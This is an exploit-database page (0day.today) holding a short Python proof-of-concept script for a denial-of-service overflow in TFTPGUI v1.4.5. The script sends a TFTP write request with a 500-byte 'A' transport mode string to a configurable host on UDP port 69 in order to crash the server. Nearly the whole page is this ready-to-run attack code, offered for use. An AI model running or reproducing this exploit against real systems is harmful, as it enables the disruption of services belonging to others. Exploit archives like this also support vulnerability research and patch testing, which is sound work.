[ authorization ] [ registration ] [ استعادة ]
اتصل بنا
يمكنكم الاتصال بنا من خلال:
0day.today Exploits Market and 0day Exploits Database

TFTPGUI v1.4.5 Long Transport Mode Overflow

المؤلف
Jeremiah Talamantes
الخطر
[
Security Risk Unsored
]
0day-ID
0day-ID-12110
الصنف
dos / poc
تاريخ الإضافة
02-05-2010
المنصة
windows
===========================================
TFTPGUI v1.4.5 Long Transport Mode Overflow
===========================================

#!/usr/bin/python
print "\n#################################################################"
print "##                      RedTeam Security                       ##"
print "##             TFTPGUI Long Transport Mode Overflow            ##"
print "##                        Version 1.4.5                        ##"
print "##                      LIST Vulnerability                     ##"
print "##                                                             ##"
print "##                     Jeremiah Talamantes                     ##"
print "##                   [email protected]                    ##"
print "################################################################# \n"
 
import socket
import sys
 
# Change these values to suit your needs
host = '192.168.1.108'
port = 69
  
try:
   s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
   print "Error: unable to connect."
   sys.exit(1)
  
# Creating the overly long transport mode string
fn = "A"
md = "A" * 500
stuff = "\x00\x02" + fn + "\0" + md + "\0"
 
# Send data
s.sendto(stuff, (host, port))
print "Check to see if TFTPGUI is still running..."
 
# End



#  0day.today [2024-06-28]  #